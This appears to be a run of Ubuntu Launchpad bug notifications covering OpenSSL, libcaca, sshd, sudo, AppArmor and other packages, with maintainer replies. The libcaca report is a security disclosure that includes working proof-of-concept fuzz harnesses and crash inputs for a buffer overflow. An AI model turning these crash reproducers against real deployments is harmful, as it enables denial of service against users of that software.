  $ cat << EOF >> subCA.cnf
  [ req ]
  prompt  = no
  distinguished_name  = req_distinguished_name
  x509_extensions = usr_cert

  [ req_distinguished_name ]
  C  = DE
  O  = Test Org
  CN = Test RSA PSS Sub-CA

  [ usr_cert ]
  basicConstraints= critical,CA:TRUE,pathlen:0
  keyUsage= critical,keyCertSign,cRLSign
  subjectKeyIdentifier= hash
  authorityKeyIdentifier  = keyid:always
  EOF

  $ cat << EOF >> user.cnf
  [ req ]
  prompt  = no
  distinguished_name  = req_distinguished_name
  x509_extensions = usr_cert

  [ req_distinguished_name ]
  C  = DE
  O  = Test Org
  CN = Test User

  [ usr_cert ]
  basicConstraints= critical,CA:FALSE,pathlen:0
  keyUsage= critical,digitalSignature,keyAgreement
  extendedKeyUsage= clientAuth,serverAuth
  subjectKeyIdentifier= hash
  authorityKeyIdentifier  = keyid:always
  EOF

  Then generate the necessary RSA keys and form certificates:

  $ openssl genpkey -algorithm RSA-PSS -out rootCA_key.pem -pkeyopt 
rsa_keygen_bits:2048
  $ openssl req -config rootCA.cnf -set_serial 01 -new -batch -sha256 -nodes 
-x509 -days 9125 -out CA/rootCA_cert.pem -key rootCA_key.pem -sigopt 
rsa_padding_mode:pss -sigopt rsa_pss_saltlen:-1

  $ openssl genpkey -algorithm RSA-PSS -out subCA_key.pem -pkeyopt 
rsa_keygen_bits:2048
  $ openssl req -config subCA.cnf -new -out subCA_req.pem -key subCA_key.pem 
-sigopt rsa_padding_mode:pss -sigopt rsa_pss_saltlen:-1
  $ openssl x509 -req -sha256 -in subCA_req.pem -CA CA/rootCA_cert.pem -CAkey 
rootCA_key.pem -out CA/subCA_cert.pem -CAserial rootCA_serial.txt 
-CAcreateserial -extfile subCA.cnf -extensions usr_cert -days 4380 -sigopt 
rsa_padding_mode:pss -sigopt rsa_pss_saltlen:-1
  $ c_rehash CA

  $ openssl genpkey -algorithm RSA-PSS -out user1_key.pem -pkeyopt 
rsa_keygen_bits:2048
  $ openssl req -config user.cnf -new -out user1_req.pem -key user1_key.pem 
-sigopt rsa_padding_mode:pss -sigopt rsa_pss_saltlen:-1
  $ openssl x509 -req -sha256 -in user1_req.pem -CA CA/subCA_cert.pem -CAkey 
subCA_key.pem -out user1_cert.pem -CAserial subCA_serial.txt -CAcreateserial 
-extfile user.cnf -extensions usr_cert -days 1825 -sigopt rsa_padding_mode:pss 
-sigopt rsa_pss_saltlen:-1

  Now, let's try verify the generated certificates:

  $ openssl version
  OpenSSL 1.1.1f  31 Mar 2020
  $ openssl verify -CAfile CA/rootCA_cert.pem -untrusted CA/subCA_cert.pem 
user1_cert.pem
  error 20 at 0 depth lookup: unable to 

[Touch-packages] [Bug 1926254] Re: x509 Certificate verification fails when basicConstraints=CA:FALSE, pathlen:0 on self-signed leaf certs

2021-04-30 Thread Seth Arnold
Hello Dan and Matthew, thanks for working on this. I gave the debdiffs a
look, skimmed through openssl changes, and don't see any reason to not
do this. There *are* larger changes to that function in
https://github.com/openssl/openssl/commit/1e41dadfa7b9f792ed0f4714a3d3d36f070cf30e
-- but it's a fairly invasive change, and I'm not recommending or
suggesting we take it instead. It'd be nice though if someone could
double-check the certs in question against a build that uses this newer
commit and make sure that we're not backporting a very short-lived
functional change.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1926254

Title:
  x509 Certificate verification fails when
  basicConstraints=CA:FALSE,pathlen:0 on self-signed leaf certs

Status in openssl package in Ubuntu:
  Fix Released
Status in openssl source package in Focal:
  In Progress
Status in openssl source package in Groovy:
  In Progress
Status in openssl source package in Hirsute:
  Fix Released

Bug description:
  [Impact]

  In openssl 1.1.1f, the below commit was merged:

  commit ba4356ae4002a04e28642da60c551877eea804f7
  Author: Bernd Edlinger 
  Date:   Sat Jan 4 15:54:53 2020 +0100
  Subject: Fix error handling in x509v3_cache_extensions and related functions
  Link: 
https://github.com/openssl/openssl/commit/ba4356ae4002a04e28642da60c551877eea804f7

  This introduced a regression which caused certificate validation to
  fail when certificates violate RFC 5280 [1], namely, when a
  certificate has "basicConstraints=CA:FALSE,pathlen:0". This
  combination is commonly seen by self-signed leaf certificates with an
  intermediate CA before the root CA.

  Because of this, openssl 1.1.1f rejects these certificates and they
  cannot be used in the system certificate store, and ssl connections
  fail when you try to use them to connect to a ssl endpoint.

  The error you see when you try verify is:

  $ openssl verify -CAfile CA/rootCA_cert.pem -untrusted CA/subCA_cert.pem 
user1_cert.pem
  error 20 at 0 depth lookup: unable to get local issuer certificate
  error user1_cert.pem: verification failed

  The exact same certificates work fine on Xenial, Bionic and Hirsute.

  [1] https://tools.ietf.org/html/rfc5280.html

  [Testcase]

  We will create our own root CA, intermediate CA and leaf server
  certificate.

  Create necessary directories:

  $ mkdir reproducer
  $ cd reproducer
  $ mkdir CA

  Write openssl configuration files to disk for each CA and cert:

  $ cat << EOF >> rootCA.cnf
  [ req ]
  prompt  = no
  distinguished_name  = req_distinguished_name
  x509_extensions = usr_cert

  [ req_distinguished_name ]
  C  = DE
  O  = Test Org
  CN = Test RSA PSS Root-CA

  [ usr_cert ]
  basicConstraints= critical,CA:TRUE
  keyUsage= critical,keyCertSign,cRLSign
  subjectKeyIdentifier= hash
  authorityKeyIdentifier  = keyid:always
  EOF

  $ cat << EOF >> subCA.cnf
  [ req ]
  prompt  = no
  distinguished_name  = req_distinguished_name
  x509_extensions = usr_cert

  [ req_distinguished_name ]
  C  = DE
  O  = Test Org
  CN = Test RSA PSS Sub-CA

  [ usr_cert ]
  basicConstraints= critical,CA:TRUE,pathlen:0
  keyUsage= critical,keyCertSign,cRLSign
  subjectKeyIdentifier= hash
  authorityKeyIdentifier  = keyid:always
  EOF

  $ cat << EOF >> user.cnf
  [ req ]
  prompt  = no
  distinguished_name  = req_distinguished_name
  x509_extensions = usr_cert

  [ req_distinguished_name ]
  C  = DE
  O  = Test Org
  CN = Test User

  [ usr_cert ]
  basicConstraints= critical,CA:FALSE,pathlen:0
  keyUsage= critical,digitalSignature,keyAgreement
  extendedKeyUsage= clientAuth,serverAuth
  subjectKeyIdentifier= hash
  authorityKeyIdentifier  = keyid:always
  EOF

  Then generate the necessary RSA keys and form certificates:

  $ openssl genpkey -algorithm RSA-PSS -out rootCA_key.pem -pkeyopt 
rsa_keygen_bits:2048
  $ openssl req -config rootCA.cnf -set_serial 01 -new -batch -sha256 -nodes 
-x509 -days 9125 -out CA/rootCA_cert.pem -key rootCA_key.pem -sigopt 
rsa_padding_mode:pss -sigopt rsa_pss_saltlen:-1

  $ openssl genpkey -algorithm RSA-PSS -out subCA_key.pem -pkeyopt 
rsa_keygen_bits:2048
  $ openssl req -config subCA.cnf -new -out subCA_req.pem -key subCA_key.pem 
-sigopt rsa_padding_mode:pss -sigopt rsa_pss_saltlen:-1
  $ openssl x509 -req -sha256 -in subCA_req.pem -CA CA/rootCA_cert.pem -CAkey 
rootCA_key.pem -out CA/subCA_cert.pem -CAserial rootCA_serial.txt 
-CAcreateserial -extfile subCA.cnf -extensions usr_cert -days 4380 -sigopt 
rsa_padding_mode:pss -sigopt rsa_pss_saltlen:-1
  $ c_rehash CA

  $ openssl genpkey -algorithm RSA-PSS -out user1_key.pem -pkeyopt 
rsa_keygen_bits:2048
  $ openssl req -config user.cnf -new -out user1_req.pem -key user1_key.pem 
-sigopt 

[Touch-packages] [Bug 1892559] Re: [MIR] ccid libpam-pkcs1 libpcsc-perl opensc pcsc-tools pcsc-lite

2021-04-29 Thread Seth Arnold
Thanks Marco, I'll take pam-pkcs11 off our todo list. (This can be
reversed, of course. If it turns out to be necessary for something,
someone shout. :)

Thanks

** Changed in: pam-pkcs11 (Ubuntu)
   Status: New => Invalid

** Changed in: pam-pkcs11 (Ubuntu)
 Assignee: Ubuntu Security Team (ubuntu-security) => (unassigned)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pcsc-lite in Ubuntu.
https://bugs.launchpad.net/bugs/1892559

Title:
  [MIR] ccid libpam-pkcs1 libpcsc-perl opensc pcsc-tools pcsc-lite

Status in ccid package in Ubuntu:
  New
Status in opensc package in Ubuntu:
  Incomplete
Status in pam-pkcs11 package in Ubuntu:
  Invalid
Status in pcsc-lite package in Ubuntu:
  New
Status in pcsc-perl package in Ubuntu:
  Invalid
Status in pcsc-tools package in Ubuntu:
  Invalid

Bug description:
  ==> ccid <==
  [Availability]
  ccid is in universe, and builds on all architectures.

  [Rationale]
  The desktop team and security team are interested in bringing smartcard
  authentication to enterprise desktop environments.

  [Security]
  No CVEs for ccid are listed in our database.
  Doesn't appear to bind to a socket.
  No privileged executables, but does have udev rules.
  Probably needs a security review.

  [Quality assurance]
  No test suite.
  Does require odd hardware that we'll probably need to buy.
  I don't see debconf questions.
  ccid is well maintained in Debian by upstream author.
  One open wishlist bug in BTS, harmless.

  One open bug in launchpad, not security, but looks very frustrating
  for the users. The upstream author was engaged but it never reached
  resolution.  https://bugs.launchpad.net/ubuntu/+source/ccid/+bug/1175465

  Has a debian/watch file.
  Quilt packaging.

  P: ccid source: no-dep5-copyright
  P: ccid source: package-uses-experimental-debhelper-compat-version 13

  [Dependencies]
  Minimal dependencies, in main

  [Standards compliance]
  Appears to satisfy FHS and Debian policy

  [Maintenance]
  The desktop team will subscribe to bugs, however it is expected that the
  security team will assist with security-relevant questions.

  [Background information]
  ccid provides drivers to interact with usb-connected smart card readers.

  ==> libpam-pkcs11 <==
  [Availability]
  Source package pam-pkcs11 is in universe and builds on all architectures.

  [Rationale]
  The desktop team and security team are interested in bringing smartcard
  authentication to enterprise desktop environments.

  [Security]
  No CVEs in our database.
  Doesn't appear to bind to sockets.
  No privileged executables (but is a PAM module).
  As a PAM module this will require a security review.

  [Quality assurance]
  The package does not call pam-auth-update in its postinst #1650366
  Does not ask questions during install.
  One Ubuntu bug claims very poor behaviour if a card isn't plugged in.
  No Debian bugs.
  Occasional updates in Debian by long-term maintainer.
  Does require odd hardware that we'll probably need to buy.
  Does not appear to run tests during build.
  Has scary warnings in the build logs.
  Has a debian/watch file.

  Ancient standards version; other smaller lintian messages, mostly
  documentation problems.

  Quilt packaging.

  [Dependencies]
  Depends on libcurl4, libldap-2.4-2, libpam0g, libpcsclite1, libssl1.1
  All are in main.

  [Standards compliance]
  The package does not call pam-auth-update in its postinst #1650366
  Otherwise looks to conform to FHS and Debian policies

  [Maintenance]
  The desktop team will subscribe to bugs, however it is expected that the
  security team will assist with security-relevant questions.

  [Background information]
  This PAM module can use CRLs and full-chain verification of certificates.
  It can also do LDAP, AD, and Kerberos username mapping.

  ==> libpcsc-perl <==
  [Availability]
  Source package pcsc-perl is in universe, builds for all architectures,
  plus i386

  [Rationale]
  The desktop team and security team are interested in bringing smartcard
  authentication to enterprise desktop environments.

  [Security]
  There are no cves for pcsc-perl in our database.
  No privileged executables.
  Doesn't appear to bind to sockets.
  Probably needs a security review.

  [Quality assurance]
  Library package not intended to be used directly.
  No debconf questions.
  No bugs in Debian.
  No bugs in Ubuntu.
  Does require odd hardware that we'll probably need to buy.
  Tests exist, not run during the build; probably can't run during the build.
  Includes debian/watch file.
  A handful of lintian issues
  Quilt packaging.

  [Dependencies]
  libpcsc-perl depends upon libpcsclite1, libc6, perl, perlapi-5.30.0.
  All are in main.

  [Standards compliance]
  One oddity, Card.pod is stored in 
/usr/lib/x86_64-linux-gnu/perl5/5.30/Chipcard/PCSC/
  Many other perl packages have .pod files in these directory trees so maybe
  it's fine, but it seems 

[Touch-packages] [Bug 1923273] Re: libcaca buffer-overflow

2021-04-09 Thread Seth Arnold
** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1923273

Title:
  libcaca buffer-overflow

Status in libcaca package in Ubuntu:
  New

Bug description:
  Hello Ubuntu Security Team
  I use libfuzzer to test libcaca api .I found two crash

  - https://github.com/cacalabs/libcaca/issues/53

  - https://github.com/cacalabs/libcaca/issues/54

  
  ## Vendor of Product
  https://github.com/cacalabs/libcaca

  
  ## Affected Product Code Base
  libcaca e4968ba
  
  ## Affected Component
  affected component:libcaca.so
  
  ## Affected source code file
  affected source code file(As call stack):

 ->caca_export_canvas_to_memory()  in
  libcaca/caca/codec/export.c

 ->caca_export_memory()in
  libcaca/caca/codec/export.c

 -> export_tga()in  
libcaca/caca/codec/export.c

-> export_troff()   in  
libcaca/caca/codec/export.c

   
  ## Attack Type
  Context-dependent

  
  ## Impact Denial of Service
  true

  
  ## Reference
  https://github.com/cacalabs/libcaca

  
  ## Discoverer
  fdgnneig

  
  ## Verification process and POC

  ### Verification steps:

  1.Get the source code of libcaca:

  2.Compile the libcaca.so library:

  ```shell
  $ cd libcaca
  $ apt-get install automake libtool pkg-config -y
  $ ./bootstrap
  $ ./configure
  $ make

  3.Run POC.sh to compile poc_troff.cc 、poc_tga.cc

  4.Run POC

  
  POC.sh
  ```
  cat << EOF > poc_troff.cc
  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

  extern "C"  int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t
  Size) {

   if(Size<8) return 0;
   size_t len=0;
   char* buffer = (char*)malloc(Size+1);
   memset(buffer,0,Size);
   memcpy(buffer,Data,Size);
   buffer[Size]='\0';
   caca_canvas_t *cv;
   cv = caca_create_canvas(0,0);
   for(int i=0;i<4;i++)
 caca_create_frame(cv,0);
   for(int i=0;i<4;i++){
 caca_set_frame(cv,i);
 caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
   }
   void* reData = caca_export_canvas_to_memory(cv,"troff",);
   if(reData!=NULL) free(reData);
   caca_free_canvas(cv);
   cv=NULL;
   free(buffer);
   buffer=NULL;

  }

  
  int main(int args,char* argv[]){

 size_t  len = 0;
 unsigned char buffer[] = 
{0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11};
 len = sizeof(buffer)/sizeof(unsigned char);
 LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
 printf("%d\n",sizeof(buffer)/sizeof(unsigned char));

 return 0;

  }
  EOF

  clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address
  -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o
  poc_troff

  
  cat << EOF > poc_tga.cc
  #include "config.h"
  #include "caca.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

  extern "C"  int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t
  Size) {

   if(Size<8) return 0;
   size_t len=0;
   char* buffer = (char*)malloc(Size+1);
   memset(buffer,0,Size);
   memcpy(buffer,Data,Size);
   buffer[Size]='\0';
   caca_canvas_t *cv;
   cv = caca_create_canvas(0,0);
   for(int i=0;i<4;i++)
 caca_create_frame(cv,0);
   for(int i=0;i<4;i++){
 caca_set_frame(cv,i);
 caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
   }
   void* reData = caca_export_canvas_to_memory(cv,"tga",);
   if(reData!=NULL) free(reData);
   caca_free_canvas(cv);
   cv=NULL;
   free(buffer);
   buffer=NULL;
 return 0;
  }

  int main(int args,char* argv[]){

 size_t  len = 0;
 unsigned char buffer[] = 
{0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11};
 len = sizeof(buffer)/sizeof(unsigned char);
 LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
 printf("%d\n",sizeof(buffer)/sizeof(unsigned char));

 return 0;
  }
  EOF

  clang++ -g poc_tga.cc -O2 -fno-omit-frame-pointer 

[Touch-packages] [Bug 1923262] Re: backup /etc/passwd- file should be mode 0600

2021-04-09 Thread Seth Arnold
Hello, this sounds like surprising advice to me -- afterall the
/etc/passwd file is 644. I don't know what would be the point of hiding
this 'backup' file. Does the benchmark give a rationale for this?

Thanks

** Information type changed from Private Security to Public Security

** Changed in: shadow (Ubuntu)
   Status: New => Incomplete

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1923262

Title:
  backup /etc/passwd- file should be mode 0600

Status in shadow package in Ubuntu:
  Incomplete

Bug description:
  CIS hardening benchmarks (6.1.6) suggest that the /etc/passwd- file
  should be mode 0600 (or more restrictive).

  However, this file is 0644 after it is created when the /etc/passwd
  file is modified. (Ie, a hardening script that creates a hardened
  system for initial use could change this mode, but it will go out of
  compliance the next time a backup file is made.)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1923262/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1921552] Re: xscreensavers

2021-04-05 Thread Seth Arnold
Thank you for taking the time to report this bug and helping to make
Ubuntu better.  Reviewing your dmesg attachment to this bug report it
seems that there may be a problem with your hardware.  I'd recommend
performing a back up and then investigating the situation.  Measures you
might take include checking cable connections and using software tools
to investigate the health of your hardware.  In the event that is is not
in fact an error with your hardware please set the bug's status back to
New.  Thanks and good luck!

** Changed in: xorg (Ubuntu)
   Status: Fix Released => Invalid

** Changed in: xorg (Ubuntu)
   Importance: Undecided => Low

** Tags added: hardware-error

** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to xorg in Ubuntu.
https://bugs.launchpad.net/bugs/1921552

Title:
  xscreensavers

Status in xorg package in Ubuntu:
  Invalid

Bug description:
  Something about 'daemon' or 'run demo'

  ProblemType: Bug
  DistroRelease: Ubuntu 20.04
  Package: xorg 1:7.7+19ubuntu14
  ProcVersionSignature: Ubuntu 5.4.0-70.78-generic 5.4.94
  Uname: Linux 5.4.0-70-generic x86_64
  .tmp.unity_support_test.0:
   
  ApportVersion: 2.20.11-0ubuntu27.16
  Architecture: amd64
  CasperMD5CheckResult: skip
  CompizPlugins: No value set for 
`/apps/compiz-1/general/screen0/options/active_plugins'
  CompositorRunning: None
  Date: Fri Mar 26 16:31:19 2021
  DistUpgraded: 2021-01-08 14:56:49,798 DEBUG icon theme changed, re-reading
  DistroCodename: focal
  DistroVariant: ubuntu
  ExtraDebuggingInterest: I just need to know a workaround
  GraphicsCard:
   Advanced Micro Devices, Inc. [AMD/ATI] Wrestler [Radeon HD 6310] [1002:9802] 
(prog-if 00 [VGA controller])
 Subsystem: Lenovo Wrestler [Radeon HD 6310] [17aa:397f]
  InstallationDate: Installed on 2020-12-18 (98 days ago)
  InstallationMedia: Ubuntu 14.04.1 LTS "Trusty Tahr" - Release amd64 
(20140722.2)
  MachineType: LENOVO 2181
  ProcEnviron:
   PATH=(custom, no user)
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.4.0-70-generic 
root=UUID=c44a1ac5-9dee-4bf8-a246-6303f68e5c24 ro quiet splash
  SourcePackage: xorg
  UpgradeStatus: Upgraded to focal on 2021-01-08 (77 days ago)
  dmi.bios.date: 10/02/2012
  dmi.bios.vendor: LENOVO
  dmi.bios.version: 6CCN93WW(V8.05)
  dmi.board.asset.tag: No Asset Tag
  dmi.board.name: Lenovo G585
  dmi.board.vendor: LENOVO
  dmi.board.version: 3193WIN8 STD MLT
  dmi.chassis.asset.tag: No Asset Tag
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: Lenovo G585
  dmi.modalias: 
dmi:bvnLENOVO:bvr6CCN93WW(V8.05):bd10/02/2012:svnLENOVO:pn2181:pvrLenovoG585:rvnLENOVO:rnLenovoG585:rvr3193WIN8STDMLT:cvnLENOVO:ct10:cvrLenovoG585:
  dmi.product.family: IDEAPAD
  dmi.product.name: 2181
  dmi.product.sku: LENOVO_MT_2181
  dmi.product.version: Lenovo G585
  dmi.sys.vendor: LENOVO
  version.compiz: compiz 1:0.9.14.1+20.04.20200211-0ubuntu1
  version.libdrm2: libdrm2 2.4.102-1ubuntu1~20.04.1
  version.libgl1-mesa-dri: libgl1-mesa-dri 20.2.6-0ubuntu0.20.04.1
  version.libgl1-mesa-glx: libgl1-mesa-glx 20.2.6-0ubuntu0.20.04.1
  version.xserver-xorg-core: xserver-xorg-core 2:1.20.9-2ubuntu1.2~20.04.1
  version.xserver-xorg-input-evdev: xserver-xorg-input-evdev 1:2.10.6-1
  version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:19.1.0-1
  version.xserver-xorg-video-intel: xserver-xorg-video-intel 
2:2.99.917+git20200226-1
  version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.16-1
  xserver.bootTime: Tue Feb  9 06:34:08 2021
  xserver.configfile: default
  xserver.logfile: /var/log/Xorg.0.log
  xserver.version: 2:1.20.9-2ubuntu1.2~20.04.1

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/xorg/+bug/1921552/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1922212] Re: SSHD does not honor configuration files

2021-04-01 Thread Seth Arnold
Hello Jeffrey, this reminds me a little of
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1876320 -- but
it's also something that should have been addressed last year.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1922212

Title:
  SSHD does not honor configuration files

Status in openssh package in Ubuntu:
  New

Bug description:
  I'm working on Ubuntu 20, x86_64, fully patched.

 # lsb_release -a
 Distributor ID:Ubuntu
 Description:   Ubuntu 20.04.2 LTS
 ...

  We are seeing reports of failed password-based logins using root:

 jounralctl -xe
 ...
 Apr 01 09:08:21 localhost sshd[239302]: Failed password for root from 
49.88.112.77 port 36206 ssh2
 Apr 01 09:08:21 localhost sshd[239302]: Failed password for root from 
49.88.112.77 port 36206 ssh2
 ...

  There are three attempts every second or two (literally):

 # journalctl -xe | grep -i -c 'Failed password for root'
 324

  Our OpenSSH server is configured with both no-password based logins
  and no-root logins.

 # ls /etc/ssh/sshd_config.d/
 10_pubkey_auth.conf  20_disable_root_login.conf

 # cat /etc/ssh/sshd_config.d/10_pubkey_auth.conf 
 # Disable passwords
 PasswordAuthentication no
 ChallengeResponseAuthentication no
 UsePAM no
 # Enable public key
 PubkeyAuthentication yes

 # cat /etc/ssh/sshd_config.d/20_disable_root_login.conf 
 PermitRootLogin no

  The config files are included last in our /etc/ssh/sshd_config file:

 # tail -n 3 /etc/ssh/sshd_config

 # For some reason OpenSSH does not include additional conf files by 
default.
 Include /etc/ssh/sshd_config.d/*.conf

  I dislike modifying /etc/ssh/sshd_config since it will be overwritten
  by the distro. With that said, I modified it without success.

  It really annoys me that we can't secure this service. Something looks
  very broken here.

  -

  # apt-cache show openssh-server
  Package: openssh-server
  Architecture: amd64
  Version: 1:8.2p1-4ubuntu0.2
  Multi-Arch: foreign
  Priority: optional
  Section: net
  Source: openssh
  Origin: Ubuntu
  Maintainer: Ubuntu Developers 
  Original-Maintainer: Debian OpenSSH Maintainers 
  Bugs: https://bugs.launchpad.net/ubuntu/+filebug

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1922212/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1921423] Re: package sudo 1.8.31-1ubuntu1.2 failed to install/upgrade: o subprocesso instalado, do pacote sudo, o script post-installation retornou erro do status de saída 1

2021-03-25 Thread Seth Arnold
Hello Alex, I would guess that the reason why the permissions are
incorrect is probably whatever tool added four copies of this to your
sudoers:

ALL ALL=(ALL) NOPASSWD:/usr/share/dtsremoter/remoterserver
ALL ALL=(ALL) NOPASSWD:/usr/share/dtsremoter/remoterdelegate

Any tool that would do that is probably pretty poorly written. That's my
guess where to lay blame.

If you don't have any open root command shells, I suggest rebooting into
a recovery mode to change the permissions on the file. If you get the
same "Operação não permitida" response, try chattr -i /etc/sudoers and
then try again.

Thanks

** Changed in: sudo (Ubuntu)
   Status: New => Incomplete

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to sudo in Ubuntu.
https://bugs.launchpad.net/bugs/1921423

Title:
  package sudo 1.8.31-1ubuntu1.2 failed to install/upgrade: o
  subprocesso instalado, do pacote sudo, o script post-installation
  retornou erro do status de saída 1

Status in sudo package in Ubuntu:
  Incomplete

Bug description:
  The privileges of my /etc/sudoers file is 220. I don't have any idea
  on how it was changed, and I tried many different ways to chmod it and
  I didn't get to do it, even booting from another media and trying to
  chmod the file didn't work.

  It's the main reason of the many errors that started happening when
  updating this machine.

  I can't stop this machine now, and I don't want to run the risk of
  trying to use the installation software to try to repair it.

  If you have any idea on how to chmod the file, I'll be grateful.

  Best regards,

  Alex Leandro Rosa

  ProblemType: Package
  DistroRelease: Ubuntu 20.04
  Package: sudo 1.8.31-1ubuntu1.2
  ProcVersionSignature: Ubuntu 5.4.0-70.78-generic 5.4.94
  Uname: Linux 5.4.0-70-generic x86_64
  ApportVersion: 2.20.11-0ubuntu27.16
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Thu Mar 25 15:00:47 2021
  ErrorMessage: o subprocesso instalado, do pacote sudo, o script 
post-installation retornou erro do status de saída 1
  InstallationDate: Installed on 2018-12-12 (833 days ago)
  InstallationMedia: Ubuntu 18.04 LTS "Bionic Beaver" - Release amd64 (20180426)
  Python3Details: /usr/bin/python3.8, Python 3.8.5, python3-minimal, 
3.8.2-0ubuntu2
  PythonDetails: /usr/bin/python2.7, Python 2.7.18, python-is-python2, 2.7.17-4
  RelatedPackageVersions:
   dpkg 1.19.7ubuntu3
   apt  2.0.4
  SourcePackage: sudo
  Title: package sudo 1.8.31-1ubuntu1.2 failed to install/upgrade: o 
subprocesso instalado, do pacote sudo, o script post-installation retornou erro 
do status de saída 1
  UpgradeStatus: Upgraded to focal on 2020-09-30 (175 days ago)
  VisudoCheck:
   /etc/sudoers: análise OK
   /etc/sudoers.d/README: análise OK
  mtime.conffile..etc.sudoers: 2020-12-30T18:27:17.782421

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/sudo/+bug/1921423/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1766628] Re: apparmor denies VLC to open files in devmode

2021-03-19 Thread Seth Arnold
AppArmor just enforces the policies that were given to it; please report
this issue to whoever packaged the snap you're using.

Thanks

** Changed in: apparmor (Ubuntu)
   Status: Confirmed => Invalid

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1766628

Title:
  apparmor denies VLC to open files in devmode

Status in apparmor package in Ubuntu:
  Invalid

Bug description:
  I see failures in VLC trying to open files and prefs while VLC snap
  seemingly uses devmode since this is on Debian "testing".

  Failures:
  ^[[1;3CApr 24 17:50:24 coal kernel: [ 7997.906298] audit: type=1400 
audit(1524581424.694:1944): apparmor="DENIED" operation="link" info="Failed 
name lookup - deleted entry" error=-2 profile="snap.vlc.vlc" 
name="/home/thresh/snap/vlc/288/.local/share/#268898190" pid=19173 comm="vlc" 
requested_mask="l" denied_mask="l" fsuid=1000 ouid=1000
  Apr 24 17:50:24 coal kernel: [ 7997.906308] audit: type=1400 
audit(1524581424.694:1945): apparmor="DENIED" operation="link" 
profile="snap.vlc.vlc" 
name="/home/thresh/snap/vlc/288/.local/share/user-places.xbel.tbcache" 
pid=19173 comm="vlc" requested_mask="l" denied_mask="l" fsuid=1000 ouid=1000 
target="/home/thresh/snap/vlc/288/.local/share/#268898190"
  Apr 24 17:50:24 coal kernel: [ 7997.912113] audit: type=1400 
audit(1524581424.698:1946): apparmor="DENIED" operation="link" info="Failed 
name lookup - deleted entry" error=-2 profile="snap.vlc.vlc" 
name="/home/thresh/snap/vlc/288/.local/share/#268898190" pid=19173 comm="vlc" 
requested_mask="l" denied_mask="l" fsuid=1000 ouid=1000
  Apr 24 17:50:24 coal kernel: [ 7997.912122] audit: type=1400 
audit(1524581424.698:1947): apparmor="DENIED" operation="link" 
profile="snap.vlc.vlc" 
name="/home/thresh/snap/vlc/288/.local/share/user-places.xbel" pid=19173 
comm="vlc" requested_mask="l" denied_mask="l" fsuid=1000 ouid=1000 
target="/home/thresh/snap/vlc/288/.local/share/#268898190"
  Apr 24 17:50:28 coal kernel: [ 8001.418173] audit: type=1400 
audit(1524581428.206:1948): apparmor="DENIED" operation="link" info="Failed 
name lookup - deleted entry" error=-2 profile="snap.vlc.vlc" 
name="/home/thresh/snap/vlc/288/.local/share/#268898190" pid=19173 comm="vlc" 
requested_mask="l" denied_mask="l" fsuid=1000 ouid=1000
  Apr 24 17:50:28 coal kernel: [ 8001.418180] audit: type=1400 
audit(1524581428.206:1949): apparmor="DENIED" operation="link" 
profile="snap.vlc.vlc" 
name="/home/thresh/snap/vlc/288/.local/share/user-places.xbel.tbcache" 
pid=19173 comm="vlc" requested_mask="l" denied_mask="l" fsuid=1000 ouid=1000 
target="/home/thresh/snap/vlc/288/.local/share/#268898190"
  Apr 24 17:50:28 coal kernel: [ 8001.422473] audit: type=1400 
audit(1524581428.210:1950): apparmor="DENIED" operation="link" info="Failed 
